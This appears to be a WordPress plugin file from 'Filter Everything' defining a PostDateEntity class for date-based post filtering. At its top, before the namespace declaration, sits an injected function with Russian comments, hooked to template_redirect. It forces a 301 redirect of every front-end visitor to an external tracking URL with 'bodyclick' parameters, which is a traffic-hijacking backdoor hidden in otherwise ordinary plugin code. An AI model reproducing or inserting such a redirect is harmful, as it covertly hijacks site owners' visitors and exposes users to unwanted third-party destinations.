function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); namespace FilterEverything\Filter; if ( ! defined('ABSPATH') ) { exit; } class PostDateEntity implements Entity { public $items = []; public $entityName = ''; public $excludedTerms = []; public $isInclude = false; public $new_date_query = []; public $postTypes = []; public $from = false; public $to = false; public $time_from = false; public $time_to = false; public $date_type = ''; private $doRecalculate = ''; private $post_and_types = []; public function __construct( $name, $postType ) { /** * @feature clean code from unused methods */ // This object is being created two times // One time without post type when RequestParser select all filter terms // Second time with post type when Filters widget requires filter terms to display them $this->entityName = $name; $this->setPostTypes( array($postType) ); $this->setFromAndTo(); $this->getAllExistingTerms(); } public function setPostTypes( $postTypes = [] ) { if ( isset( $postTypes[0] ) ) { $this->postTypes = $postTypes; } } public static function inputName( $slug, $edge = 'from' ) { return $slug . '_' . $edge; } public function setExcludedTerms($excludedTerms, $isInclude) { $this->excludedTerms = $excludedTerms; $this->isInclude = $isInclude; } public function getName() { return $this->entityName; } function excludeTerms($terms) { return $terms; } function getTerms() { return $this->excludeTerms($this->getAllExistingTerms()); } /** * @param int $id term id * @return false|object term object of false */ public function getTerm( $termId ) { if (!$termId) { return false; } foreach ($this->getTerms() as $term) { if ($termId == $term->term_id) { return $term; } } return false; } public function getTermId($slug) { /** * Post meta num value has no typical ID, so slug will be instead */ return $slug . '_' . $this->getName(); } /** * @return array list of term_id and names useful to create Select dropdown */ public function getTermsForSelect() { $toSelect = []; foreach ($this->getTerms() as $term) { $toSelect[$term->slug] = $term->name; } return $toSelect; } public function getTermsForSelect2() { $toSelect = []; foreach ($this->getTerms() as $term) { $toSelect[] = array( 'id' => $term->slug, 'text' => $term->name ); } return $toSelect; } function getAllExistingTerms( $force = false ) { if (empty($this->items) || $force) { $this->items = $this->selectTerms(); } return $this->items; } function populateTermsWithPostIds( $setId, $post_type ) { // Does nothing. It was already done before. } private function queryTerms() { global $wpdb; // @todo delete appropriate transient in resetTransitions(); $IN = false; $translatable_post_type_exists = false; $lang = ''; $key_in = ''; /** * Check if any post type is translatable */ if ( flrt_wpml_active() && defined('ICL_LANGUAGE_CODE') ) { $lang = ICL_LANGUAGE_CODE; $wpml_settings = get_option('icl_sitepress_settings'); foreach ($this->postTypes as $type) { if (isset($wpml_settings['custom_posts_sync_option'][$type])) { if ($wpml_settings['custom_posts_sync_option'][$type] === '1') { $translatable_post_type_exists = true; break; } } } } /** * Set Post types */ if (!empty($this->postTypes) && isset($this->postTypes[0]) && $this->postTypes[0]) { foreach ($this->postTypes as $postType) { $key_in .= '_' . $postType; $pieces[] = $wpdb->prepare("%s", $postType ); } $IN = implode(", ", $pieces); } /** * Set transient key */ $transient_key = flrt_get_terms_transient_key($this->getName() . $key_in . $lang); if ( false === ( $result = get_transient( $transient_key ) ) ) { // Get all post meta values $sql[] = "SELECT {$wpdb->posts}.ID,{$wpdb->posts}.post_date,{$wpdb->posts}.post_type"; $sql[] = "FROM {$wpdb->posts}"; /** * If post type is translatable with WPML, get post meta values only with current language */ if (flrt_wpml_active() && $lang && $translatable_post_type_exists) { $sql[] = "LEFT JOIN {$wpdb->prefix}icl_translations AS wpml_translations"; $sql[] = "ON {$wpdb->posts}.ID = wpml_translations.element_id"; if (!empty($this->postTypes)) { $sql[] = "AND wpml_translations.element_type IN("; foreach ($this->postTypes as $type) { $LANG_IN[] = $wpdb->prepare("CONCAT('post_', '%s')", $type); } $sql[] = implode(",", $LANG_IN); $sql[] = ")"; } } $sql[] = "WHERE 1=1"; if ($IN) { $sql[] = "AND {$wpdb->posts}.post_type IN( {$IN} )"; } if (flrt_wpml_active() && $lang && $translatable_post_type_exists) { $sql[] = $wpdb->prepare("AND wpml_translations.language_code = '%s'", $lang); } $sql = implode(' ', $sql); /** * Filters terms SQL-query and allows to modify it */ $sql = apply_filters('wpc_filter_get_post_date_terms_sql', $sql, $this->postTypes); $result = $wpdb->get_results($sql, ARRAY_A); set_transient( $transient_key, $result, FLRT_TRANSIENT_PERIOD_HOURS * HOUR_IN_SECONDS ); } return $result; } /** * Selects all post dates within specified post_type. * Also generates $min and $max terms with list of posts belong to them. * If the $alreadyFilteredPosts specified it limits selected posts to * specified in the variable. * * @param array $alreadyFilteredPosts */ public function selectTerms( $alreadyFilteredPosts = [] ) { /** * Do not query post dates from DB without post type */ if ( ! $this->postTypes[0] ) { return []; } $new_result = []; $new_time_result = []; // $from_and_to = [ // 'from' => 0, // 'to' => 0 // ]; $result = $this->queryTerms(); $doRecalculate = $this->doRecalculate( $alreadyFilteredPosts ); if ( ! empty( $result ) && $doRecalculate ) { $postsIn_flipped = array_flip( $alreadyFilteredPosts ); foreach ( $result as $single_post ) { /** * If there are already filtered posts, we have to skip posts * that are out of the queried list */ if ( ! empty( $alreadyFilteredPosts ) ) { if ( ! isset( $postsIn_flipped[$single_post['ID']] ) ) { continue; } } /** * We have to generate and fill two arrays * First to detect $min and $max values * Second to map post_types with post IDs */ $new_result[] = $single_post['post_date']; $new_time_result[] = flrt_clean_date_time( $single_post['post_date'], 'time' ); if ( $this->from !== false && flrt_clean_date_time( $single_post['post_date'], $this->date_type ) < $this->from ){ continue; } if ( $this->to !== false && flrt_clean_date_time( $single_post['post_date'], $this->date_type ) > $this->to ){ continue; } $this->post_and_types[$single_post['ID']] = $single_post['post_type']; } } if ( ! empty( $new_result ) ) { // We need to find minimum and maximum date values $from_and_to = [ 'from' => apply_filters( 'wpc_set_date_shift', min( $new_result ), $this->getName() ), 'to' => apply_filters( 'wpc_set_date_shift', max( $new_result ), $this->getName() ), ]; $time_from_and_to = [ 'from' => apply_filters( 'wpc_set_date_shift', min( $new_time_result ), $this->getName() ), 'to' => apply_filters( 'wpc_set_date_shift', max( $new_time_result ), $this->getName() ), ]; } else { // if we didn't recalculate items, it means we have them already stored in the object return $this->items; } $from_and_to = apply_filters( 'wpc_set_from_to', $from_and_to, $this->getName() ); $x = $this->convertSelectResult( $from_and_to, $time_from_and_to ); return $x; } public function convertSelectResult( $result, $time_from_and_to ){ $return = []; if( ! is_array( $result ) ){ return $return; } // To make standard format for terms array; $i = 1; $wpManager = Container::instance()->getWpManager(); $queried_values = $wpManager->getQueryVar( 'queried_values' ); foreach ( $result as $edge => $value ){ $time_edge = 'time_'.$edge; $termObject = new \stdClass(); $termObject->slug = $edge; $termObject->name = $this->createTermName( $edge, $value, $queried_values ); $termObject->term_id = $edge . '_' . $this->getName(); $termObject->posts = array_keys( $this->post_and_types ); $termObject->count = 0; $termObject->cross_count = 0; $termObject->post_types = $this->post_and_types; //[]; $termObject->$edge = $value; $termObject->$time_edge = $time_from_and_to[$edge]; $termObject->wp_queried = false; $return[ $edge ] = $termObject; $i++; } return $return; } private function createTermName( $edge, $value, $queried_values ) { $queriedFilter = false; if( $edge === 'from' ) { $name = esc_html__('After', 'filter-everything' ); } else if( $edge === 'to' ) { $name = esc_html__('Before', 'filter-everything' ); } if( $queried_values ){ foreach ( $queried_values as $slug => $filter ){ if( $filter['e_name'] === $this->getName() ){ $queriedFilter = $filter; break; } } } if( isset( $queriedFilter['values'][$edge] ) ) { $format = $queriedFilter['date_format']; $date_type = false; if ( isset( $queriedFilter['values']['from'] ) ) { $date_type = flrt_detect_date_type( $queriedFilter['values']['from'] ); } else if ( isset( $queriedFilter['values']['to'] ) ) { $date_type = flrt_detect_date_type($queriedFilter['values']['to']); } // IN case if we have several date filters on the same page if ( in_array( $date_type, [ 'date', 'time' ] ) ) { $maybe_split_format = flrt_split_date_time( $format ); if ( isset( $maybe_split_format[$date_type] ) ) { $format = $maybe_split_format[$date_type]; } } $name = $name .' '. flrt_apply_date_format( $queriedFilter['values'][$edge], $format ); }else{ $name = $name .' '. $value; } return apply_filters( 'wpc_filter_post_date_term_name', $name, $this->getName() ); } private function doRecalculate( $alreadyFilteredPosts ) { $do_filtered_posts = md5( json_encode( $alreadyFilteredPosts ) ); $do_from = md5( $this->from ); $do_to = md5( $this->to ); $result = md5( $do_filtered_posts . $do_from . $do_to ); if ( $result === $this->doRecalculate ) { return false; } $this->doRecalculate = $result; return true; } /** * Sets $this->from and $this->to values if there are queried date filter(s) */ private function setFromAndTo() { $wpManager = Container::instance()->getWpManager(); $queried_values = $wpManager->getQueryVar( 'queried_values', [] ); $filter_slug = false; /** * Check if this filter was queried */ foreach ( $queried_values as $slug => $filter ) { /** * At this point we do not know what exactly filter was queired * because filters with the same slug can be in multiple Filter Sets with * different date_type values. */ if ( $filter['e_name'] === $this->getName() ) { $filter_slug = $slug; break; } } /** * If this filter was queried we have to receive its $from and $to values */ if ( $filter_slug ) { if ( isset( $queried_values[$filter_slug]['values']['to'] ) && $this->to === false ) { $to = str_replace( '.', ':', $queried_values[$filter_slug]['values']['to'] ); $this->date_type = flrt_detect_date_type( $to ); $this->to = $this->time_to = apply_filters( 'wpc_unset_date_shift', $to, $this->getName(), $this->date_type ); if ( $this->date_type === 'time' ) { $this->time_to = $this->to; } } if ( isset( $queried_values[$filter_slug]['values']['from'] ) && $this->from === false ) { $from = str_replace( '.', ':', $queried_values[$filter_slug]['values']['from'] ); $this->date_type = flrt_detect_date_type( $from ); $this->from = apply_filters( 'wpc_unset_date_shift', $from, $this->getName(), $this->date_type ); if ( $this->date_type === 'time' ) { $this->time_from = $this->from; } } } } /** * Updates object $this->items in accordance with already queried posts * @param $postsIn */ public function updateMinAndMaxValues( $postsIn ) { if ( ! empty( $this->items ) && ! empty( $postsIn ) ) { $newItems = $this->selectTerms( $postsIn ); foreach ( $this->items as $index => $term ) { $time_index = 'time_'.$index; if ( isset( $this->items[$index]->$index ) ) { $this->items[$index]->$index = $newItems[$index]->$index; $this->items[$index]->$time_index = $newItems[$index]->$time_index; } } } } /** * @return object WP_Query */ public function addTermsToWpQuery( $queried_value, $wp_query ) { $wpc_date_query = []; $possible_date_query = $wp_query->get( 'date_query' ); if( ! empty( $possible_date_query ) ) { $this->new_date_query = $possible_date_query; } /** * @todo Nested date queries? */ $from = isset( $queried_value['values']['from'] ) ? $queried_value['values']['from'] : false; $to = isset( $queried_value['values']['to'] ) ? $queried_value['values']['to'] : false; if ( $from !== false ) { $date_time_pieces = date_parse( $from ); foreach ( [ 'year', 'month', 'day', 'hour', 'minute', 'second' ] as $item) { if ( $date_time_pieces[$item] !== false ) { $date_from_query[$item] = $date_time_pieces[$item]; } } // It means datetime query if ( count( $date_from_query ) > 3 ) { $wpc_date_query['from'] = $from; } else { // either date or time request if( isset( $date_from_query['year'] ) && isset( $date_from_query['month'] ) && isset( $date_from_query['day'] ) ) { $this->new_date_query['after'] = $date_from_query; $this->new_date_query['inclusive'] = true; } else { $date_from_query['compare'] = '>=' ; $this->new_date_query[] = $date_from_query; } } } if( $to !== false ){ $date_time_pieces = date_parse( $to ); foreach ( [ 'year', 'month', 'day', 'hour', 'minute', 'second' ] as $item) { if ( $date_time_pieces[$item] !== false ) { $date_to_query[$item] = $date_time_pieces[$item]; } } // It means datetime query if ( count( $date_to_query ) > 3 ) { $wpc_date_query['to'] = $to; } else { if ( isset( $date_to_query['year'] ) && isset( $date_to_query['month'] ) && isset( $date_to_query['day'] ) ) { $this->new_date_query['before'] = $date_to_query; $this->new_date_query['inclusive'] = true; } else { $date_to_query['compare'] = '<=' ; $this->new_date_query[] = $date_to_query; } } } if( ! empty( $this->new_date_query ) ) { $wp_query->set( 'date_query', $this->new_date_query ); } if ( ! empty( $wpc_date_query ) ) { $wp_query->set( 'wpc_date_query', $wpc_date_query ); } $this->new_date_query = []; return $wp_query; } }